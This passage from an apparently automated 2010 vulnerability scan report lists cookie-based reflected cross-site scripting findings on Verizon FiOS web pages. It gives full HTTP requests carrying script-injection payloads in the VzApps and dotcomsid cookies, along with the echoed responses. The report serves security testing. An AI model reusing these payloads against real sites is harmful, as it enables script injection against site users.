Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX79db9'><script>alert(1)</script>84341307296; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70909
Expires: Sat, 20 Nov 2010 02:53:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=TX79db9'><script>alert(1)</script>84341307296; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:19 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX79DB9'><SCRIPT>ALERT(1)</SCRIPT>84341307296 ' />
...[SNIP]...

2.985. https://www22.verizon.com/Residential/aboutFiOS/Overview.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/Overview.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6862"-alert(1)-"9695dc43a78 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=c6862"-alert(1)-"9695dc43a78; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 76442
Expires: Sat, 20 Nov 2010 02:53:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:15 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:15 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
OS Digital TV and High-Speed Internet Features','');
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "c6862"-alert(1)-"9695dc43a78"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.986. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d0dac'><script>alert(1)</script>82a3c612b6a was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TXd0dac'><script>alert(1)</script>82a3c612b6a; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78167
Expires: Sat, 20 Nov 2010 02:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=TXd0dac'><script>alert(1)</script>82a3c612b6a; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXD0DAC'><SCRIPT>ALERT(1)</SCRIPT>82A3C612B6A ' />
...[SNIP]...

2.987. https://www22.verizon.com/Residential/aboutFiOS/labs/labs.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/labs/labs.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f41c"-alert(1)-"037c2ee7a79 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/labs/labs.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=1f41c"-alert(1)-"037c2ee7a79; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83946
Expires: Sat, 20 Nov 2010 02:53:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:53:21 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 02:53:21 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "1f41c"-alert(1)-"037c2ee7a79"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.988. https://www22.verizon.com/Residential/aboutFiOS/reviews/reviews.htm [VzApps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www22.verizon.com
Path:   /Residential/aboutFiOS/reviews/reviews.htm

Issue detail

The value of the VzApps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90afa'><script>alert(1)</script>32063bb4fe6 was submitted in the VzApps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/reviews/reviews.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
